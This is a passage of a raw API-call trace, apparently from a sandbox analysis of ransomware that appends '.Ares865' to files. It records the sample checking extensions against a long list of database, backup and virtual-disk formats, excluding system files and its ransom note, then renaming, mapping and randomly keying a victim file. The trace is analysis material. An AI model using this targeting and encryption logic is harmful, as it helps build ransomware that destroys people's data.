[0061.056] lstrlenW (lpString="fp4") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fp4") returned 1 [0061.056] lstrlenW (lpString="fp5") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fp5") returned 1 [0061.056] lstrlenW (lpString="fp7") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fp7") returned 1 [0061.056] lstrlenW (lpString="fpt") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fpt") returned 1 [0061.056] lstrlenW (lpString="frm") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="frm") returned 1 [0061.056] lstrlenW (lpString="gdb") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0061.057] lstrlenW (lpString="gdb") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0061.057] lstrlenW (lpString="grdb") returned 4 [0061.057] lstrcmpiW (lpString1=".log", lpString2="grdb") returned -1 [0061.057] lstrlenW (lpString="gwi") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="gwi") returned 1 [0061.057] lstrlenW (lpString="hdb") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="hdb") returned 1 [0061.057] lstrlenW (lpString="his") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="his") returned 1 [0061.057] lstrlenW (lpString="ib") returned 2 [0061.057] lstrcmpiW (lpString1="og", lpString2="ib") returned 1 [0061.057] lstrlenW (lpString="idb") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="idb") returned 1 [0061.057] lstrlenW (lpString="ihx") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="ihx") returned 1 [0061.057] lstrlenW (lpString="itdb") returned 4 [0061.057] lstrcmpiW (lpString1=".log", lpString2="itdb") returned -1 [0061.057] lstrlenW (lpString="itw") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="itw") returned 1 [0061.057] lstrlenW (lpString="jet") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="jet") returned 1 [0061.057] lstrlenW (lpString="jtx") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="jtx") returned 1 [0061.057] lstrlenW (lpString="kdb") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="kdb") returned 1 [0061.057] lstrlenW (lpString="kexi") returned 4 [0061.057] lstrcmpiW (lpString1=".log", lpString2="kexi") returned -1 [0061.057] lstrlenW (lpString="kexic") returned 5 [0061.057] lstrcmpiW (lpString1="1.log", lpString2="kexic") returned -1 [0061.057] lstrlenW (lpString="kexis") returned 5 [0061.057] lstrcmpiW (lpString1="1.log", lpString2="kexis") returned -1 [0061.057] lstrlenW (lpString="lgc") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="lgc") returned 1 [0061.057] lstrlenW (lpString="lwx") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="lwx") returned -1 [0061.057] lstrlenW (lpString="maf") returned 3 [0061.057] lstrcmpiW (lpString1="log", lpString2="maf") returned -1 [0061.058] lstrlenW (lpString="maq") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="maq") returned -1 [0061.058] lstrlenW (lpString="mar") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mar") returned -1 [0061.058] lstrlenW (lpString="marshal") returned 7 [0061.058] lstrcmpiW (lpString1="001.log", lpString2="marshal") returned -1 [0061.058] lstrlenW (lpString="mas") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mas") returned -1 [0061.058] lstrlenW (lpString="mav") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mav") returned -1 [0061.058] lstrlenW (lpString="maw") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="maw") returned -1 [0061.058] lstrlenW (lpString="mdbhtml") returned 7 [0061.058] lstrcmpiW (lpString1="001.log", lpString2="mdbhtml") returned -1 [0061.058] lstrlenW (lpString="mdn") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mdn") returned -1 [0061.058] lstrlenW (lpString="mdt") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mdt") returned -1 [0061.058] lstrlenW (lpString="mfd") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mfd") returned -1 [0061.058] lstrlenW (lpString="mpd") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mpd") returned -1 [0061.058] lstrlenW (lpString="mrg") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mrg") returned -1 [0061.058] lstrlenW (lpString="mud") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mud") returned -1 [0061.058] lstrlenW (lpString="mwb") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="mwb") returned -1 [0061.058] lstrlenW (lpString="myd") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="myd") returned -1 [0061.058] lstrlenW (lpString="ndf") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="ndf") returned -1 [0061.058] lstrlenW (lpString="nnt") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="nnt") returned -1 [0061.058] lstrlenW (lpString="nrmlib") returned 6 [0061.058] lstrcmpiW (lpString1="01.log", lpString2="nrmlib") returned -1 [0061.058] lstrlenW (lpString="ns2") returned 3 [0061.058] lstrcmpiW (lpString1="log", lpString2="ns2") returned -1 [0061.059] lstrlenW (lpString="ns3") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="ns3") returned -1 [0061.059] lstrlenW (lpString="ns4") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="ns4") returned -1 [0061.059] lstrlenW (lpString="nsf") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="nsf") returned -1 [0061.059] lstrlenW (lpString="nv") returned 2 [0061.059] lstrcmpiW (lpString1="og", lpString2="nv") returned 1 [0061.059] lstrlenW (lpString="nv2") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="nv2") returned -1 [0061.059] lstrlenW (lpString="nwdb") returned 4 [0061.059] lstrcmpiW (lpString1=".log", lpString2="nwdb") returned -1 [0061.059] lstrlenW (lpString="nyf") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="nyf") returned -1 [0061.059] lstrlenW (lpString="odb") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0061.059] lstrlenW (lpString="odb") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0061.059] lstrlenW (lpString="oqy") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="oqy") returned -1 [0061.059] lstrlenW (lpString="ora") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="ora") returned -1 [0061.059] lstrlenW (lpString="orx") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="orx") returned -1 [0061.059] lstrlenW (lpString="owc") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="owc") returned -1 [0061.059] lstrlenW (lpString="p96") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="p96") returned -1 [0061.059] lstrlenW (lpString="p97") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="p97") returned -1 [0061.059] lstrlenW (lpString="pan") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="pan") returned -1 [0061.059] lstrlenW (lpString="pdb") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="pdb") returned -1 [0061.059] lstrlenW (lpString="pdm") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="pdm") returned -1 [0061.059] lstrlenW (lpString="pnz") returned 3 [0061.059] lstrcmpiW (lpString1="log", lpString2="pnz") returned -1 [0061.059] lstrlenW (lpString="qry") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="qry") returned -1 [0061.060] lstrlenW (lpString="qvd") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="qvd") returned -1 [0061.060] lstrlenW (lpString="rbf") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="rbf") returned -1 [0061.060] lstrlenW (lpString="rctd") returned 4 [0061.060] lstrcmpiW (lpString1=".log", lpString2="rctd") returned -1 [0061.060] lstrlenW (lpString="rod") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="rod") returned -1 [0061.060] lstrlenW (lpString="rodx") returned 4 [0061.060] lstrcmpiW (lpString1=".log", lpString2="rodx") returned -1 [0061.060] lstrlenW (lpString="rpd") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="rpd") returned -1 [0061.060] lstrlenW (lpString="rsd") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="rsd") returned -1 [0061.060] lstrlenW (lpString="sas7bdat") returned 8 [0061.060] lstrcmpiW (lpString1="0001.log", lpString2="sas7bdat") returned -1 [0061.060] lstrlenW (lpString="sbf") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="sbf") returned -1 [0061.060] lstrlenW (lpString="scx") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="scx") returned -1 [0061.060] lstrlenW (lpString="sdb") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="sdb") returned -1 [0061.060] lstrlenW (lpString="sdc") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="sdc") returned -1 [0061.060] lstrlenW (lpString="sdf") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="sdf") returned -1 [0061.060] lstrlenW (lpString="sis") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="sis") returned -1 [0061.060] lstrlenW (lpString="spq") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="spq") returned -1 [0061.060] lstrlenW (lpString="te") returned 2 [0061.060] lstrcmpiW (lpString1="og", lpString2="te") returned -1 [0061.060] lstrlenW (lpString="teacher") returned 7 [0061.060] lstrcmpiW (lpString1="001.log", lpString2="teacher") returned -1 [0061.060] lstrlenW (lpString="tmd") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="tmd") returned -1 [0061.060] lstrlenW (lpString="tps") returned 3 [0061.060] lstrcmpiW (lpString1="log", lpString2="tps") returned -1 [0061.061] lstrlenW (lpString="trc") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0061.061] lstrlenW (lpString="trc") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0061.061] lstrlenW (lpString="trm") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="trm") returned -1 [0061.061] lstrlenW (lpString="udb") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="udb") returned -1 [0061.061] lstrlenW (lpString="udl") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="udl") returned -1 [0061.061] lstrlenW (lpString="usr") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="usr") returned -1 [0061.061] lstrlenW (lpString="v12") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="v12") returned -1 [0061.061] lstrlenW (lpString="vis") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="vis") returned -1 [0061.061] lstrlenW (lpString="vpd") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="vpd") returned -1 [0061.061] lstrlenW (lpString="vvv") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="vvv") returned -1 [0061.061] lstrlenW (lpString="wdb") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="wdb") returned -1 [0061.061] lstrlenW (lpString="wmdb") returned 4 [0061.061] lstrcmpiW (lpString1=".log", lpString2="wmdb") returned -1 [0061.061] lstrlenW (lpString="wrk") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="wrk") returned -1 [0061.061] lstrlenW (lpString="xdb") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="xdb") returned -1 [0061.061] lstrlenW (lpString="xld") returned 3 [0061.061] lstrcmpiW (lpString1="log", lpString2="xld") returned -1 [0061.061] lstrlenW (lpString="xmlff") returned 5 [0061.061] lstrcmpiW (lpString1="1.log", lpString2="xmlff") returned -1 [0061.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865") returned 80 [0061.061] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb00001.log.ares865"), dwFlags=0x1) returned 1 [0061.062] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb00001.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0061.062] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0061.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0061.070] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0061.072] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0061.072] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.080] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x118 [0061.086] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0061.087] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3030000 [0061.648] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0061.648] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0061.648] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.649] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.649] CloseHandle (hObject=0x118) returned 1 [0061.649] CloseHandle (hObject=0x15c) returned 1 [0061.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0061.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0061.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0061.658] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2027392, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0061.658] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="aoldtz.exe") returned 1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".") returned 1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="..") returned 1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="windows") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="bootmgr") returned 1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="temp") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="pagefile.sys") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="boot") returned 1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="ids.txt") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="ntuser.dat") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="perflogs") returned -1 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="MSBuild") returned -1 [0061.659] lstrlenW (lpString="edbres00001.jrs") returned 15 [0061.659] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log") returned 72 [0061.659] lstrcpyW (in: lpString1=0x2cce478, lpString2="edbres00001.jrs" | out: lpString1="edbres00001.jrs") returned="edbres00001.jrs" [0061.659] lstrlenW (lpString="edbres00001.jrs") returned 15 [0061.659] lstrlenW (lpString="Ares865") returned 7 [0061.659] lstrcmpiW (lpString1="001.jrs", lpString2="Ares865") returned -1 [0061.659] lstrlenW (lpString=".dll") returned 4 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".dll") returned 1 [0061.659] lstrlenW (lpString=".lnk") returned 4 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".lnk") returned 1 [0061.659] lstrlenW (lpString=".ini") returned 4 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".ini") returned 1 [0061.659] lstrlenW (lpString=".sys") returned 4 [0061.659] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".sys") returned 1 [0061.659] lstrlenW (lpString="edbres00001.jrs") returned 15 [0061.659] lstrlenW (lpString="bak") returned 3 [0061.659] lstrcmpiW (lpString1="jrs", lpString2="bak") returned 1 [0061.659] lstrlenW (lpString="ba_") returned 3 [0061.659] lstrcmpiW (lpString1="jrs", lpString2="ba_") returned 1 [0061.659] lstrlenW (lpString="dbb") returned 3 [0061.659] lstrcmpiW (lpString1="jrs", lpString2="dbb") returned 1 [0061.659] lstrlenW (lpString="vmdk") returned 4 [0061.659] lstrcmpiW (lpString1=".jrs", lpString2="vmdk") returned -1 [0061.659] lstrlenW (lpString="rar") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="rar") returned -1 [0061.660] lstrlenW (lpString="zip") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="zip") returned -1 [0061.660] lstrlenW (lpString="tgz") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="tgz") returned -1 [0061.660] lstrlenW (lpString="vbox") returned 4 [0061.660] lstrcmpiW (lpString1=".jrs", lpString2="vbox") returned -1 [0061.660] lstrlenW (lpString="vdi") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="vdi") returned -1 [0061.660] lstrlenW (lpString="vhd") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="vhd") returned -1 [0061.660] lstrlenW (lpString="vhdx") returned 4 [0061.660] lstrcmpiW (lpString1=".jrs", lpString2="vhdx") returned -1 [0061.660] lstrlenW (lpString="avhd") returned 4 [0061.660] lstrcmpiW (lpString1=".jrs", lpString2="avhd") returned -1 [0061.660] lstrlenW (lpString="db") returned 2 [0061.660] lstrcmpiW (lpString1="rs", lpString2="db") returned 1 [0061.660] lstrlenW (lpString="db2") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="db2") returned 1 [0061.660] lstrlenW (lpString="db3") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="db3") returned 1 [0061.660] lstrlenW (lpString="dbf") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="dbf") returned 1 [0061.660] lstrlenW (lpString="mdf") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="mdf") returned -1 [0061.660] lstrlenW (lpString="mdb") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="mdb") returned -1 [0061.660] lstrlenW (lpString="sql") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="sql") returned -1 [0061.660] lstrlenW (lpString="sqlite") returned 6 [0061.660] lstrcmpiW (lpString1="01.jrs", lpString2="sqlite") returned -1 [0061.660] lstrlenW (lpString="sqlite3") returned 7 [0061.660] lstrcmpiW (lpString1="001.jrs", lpString2="sqlite3") returned -1 [0061.660] lstrlenW (lpString="sqlitedb") returned 8 [0061.660] lstrcmpiW (lpString1="0001.jrs", lpString2="sqlitedb") returned -1 [0061.660] lstrlenW (lpString="xml") returned 3 [0061.660] lstrcmpiW (lpString1="jrs", lpString2="xml") returned -1 [0061.661] lstrlenW (lpString="$er") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="$er") returned 1 [0061.661] lstrlenW (lpString="4dd") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="4dd") returned 1 [0061.661] lstrlenW (lpString="4dl") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="4dl") returned 1 [0061.661] lstrlenW (lpString="^^^") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="^^^") returned 1 [0061.661] lstrlenW (lpString="abs") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="abs") returned 1 [0061.661] lstrlenW (lpString="abx") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="abx") returned 1 [0061.661] lstrlenW (lpString="accdb") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accdb") returned -1 [0061.661] lstrlenW (lpString="accdc") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accdc") returned -1 [0061.661] lstrlenW (lpString="accde") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accde") returned -1 [0061.661] lstrlenW (lpString="accdr") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accdr") returned -1 [0061.661] lstrlenW (lpString="accdt") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accdt") returned -1 [0061.661] lstrlenW (lpString="accdw") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accdw") returned -1 [0061.661] lstrlenW (lpString="accft") returned 5 [0061.661] lstrcmpiW (lpString1="1.jrs", lpString2="accft") returned -1 [0061.661] lstrlenW (lpString="adb") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="adb") returned 1 [0061.661] lstrlenW (lpString="adb") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="adb") returned 1 [0061.661] lstrlenW (lpString="ade") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="ade") returned 1 [0061.661] lstrlenW (lpString="adf") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="adf") returned 1 [0061.661] lstrlenW (lpString="adn") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="adn") returned 1 [0061.661] lstrlenW (lpString="adp") returned 3 [0061.661] lstrcmpiW (lpString1="jrs", lpString2="adp") returned 1 [0061.661] lstrlenW (lpString="alf") returned 3 [0061.662] lstrcmpiW (lpString1="jrs", lpString2="alf") returned 1 [0061.662] lstrlenW (lpString="ask") returned 3 [0061.662] lstrcmpiW (lpString1="jrs", lpString2="ask") returned 1 [0061.662] lstrlenW (lpString="btr") returned 3 [0061.662] lstrcmpiW (lpString1="jrs", lpString2="btr") returned 1 [0061.662] lstrlenW (lpString="cat") returned 3 [0061.662] lstrcmpiW (lpString1="jrs", lpString2="cat") returned 1 [0061.665] lstrlenW (lpString="cdb") returned 3 [0061.665] lstrcmpiW (lpString1="jrs", lpString2="cdb") returned 1 [0061.665] lstrlenW (lpString="ckp") returned 3 [0061.665] lstrcmpiW (lpString1="jrs", lpString2="ckp") returned 1 [0061.665] lstrlenW (lpString="cma") returned 3 [0061.666] lstrcmpiW (lpString1="jrs", lpString2="cma") returned 1 [0061.666] lstrlenW (lpString="cpd") returned 3 [0061.667] lstrcmpiW (lpString1="jrs", lpString2="cpd") returned 1 [0061.667] lstrlenW (lpString="dacpac") returned 6 [0061.667] lstrcmpiW (lpString1="01.jrs", lpString2="dacpac") returned -1 [0061.667] lstrlenW (lpString="dad") returned 3 [0061.667] lstrcmpiW (lpString1="jrs", lpString2="dad") returned 1 [0061.667] lstrlenW (lpString="dadiagrams") returned 10 [0061.667] lstrcmpiW (lpString1="s00001.jrs", lpString2="dadiagrams") returned 1 [0061.667] lstrlenW (lpString="daschema") returned 8 [0061.667] lstrcmpiW (lpString1="0001.jrs", lpString2="daschema") returned -1 [0061.667] lstrlenW (lpString="db-journal") returned 10 [0061.667] lstrcmpiW (lpString1="s00001.jrs", lpString2="db-journal") returned 1 [0061.667] lstrlenW (lpString="db-shm") returned 6 [0061.667] lstrcmpiW (lpString1="01.jrs", lpString2="db-shm") returned -1 [0061.667] lstrlenW (lpString="db-wal") returned 6 [0061.667] lstrcmpiW (lpString1="01.jrs", lpString2="db-wal") returned -1 [0061.667] lstrlenW (lpString="dbc") returned 3 [0061.667] lstrcmpiW (lpString1="jrs", lpString2="dbc") returned 1 [0061.667] lstrlenW (lpString="dbs") returned 3 [0061.667] lstrcmpiW (lpString1="jrs", lpString2="dbs") returned 1 [0061.667] lstrlenW (lpString="dbt") returned 3 [0061.667] lstrcmpiW (lpString1="jrs", lpString2="dbt") returned 1 [0061.668] lstrlenW (lpString="dbv") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dbv") returned 1 [0061.668] lstrlenW (lpString="dbx") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dbx") returned 1 [0061.668] lstrlenW (lpString="dcb") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dcb") returned 1 [0061.668] lstrlenW (lpString="dct") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dct") returned 1 [0061.668] lstrlenW (lpString="dcx") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dcx") returned 1 [0061.668] lstrlenW (lpString="ddl") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="ddl") returned 1 [0061.668] lstrlenW (lpString="dlis") returned 4 [0061.668] lstrcmpiW (lpString1=".jrs", lpString2="dlis") returned -1 [0061.668] lstrlenW (lpString="dp1") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dp1") returned 1 [0061.668] lstrlenW (lpString="dqy") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dqy") returned 1 [0061.668] lstrlenW (lpString="dsk") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dsk") returned 1 [0061.668] lstrlenW (lpString="dsn") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dsn") returned 1 [0061.668] lstrlenW (lpString="dtsx") returned 4 [0061.668] lstrcmpiW (lpString1=".jrs", lpString2="dtsx") returned -1 [0061.668] lstrlenW (lpString="dxl") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="dxl") returned 1 [0061.668] lstrlenW (lpString="eco") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="eco") returned 1 [0061.668] lstrlenW (lpString="ecx") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="ecx") returned 1 [0061.668] lstrlenW (lpString="edb") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="edb") returned 1 [0061.668] lstrlenW (lpString="epim") returned 4 [0061.668] lstrcmpiW (lpString1=".jrs", lpString2="epim") returned -1 [0061.668] lstrlenW 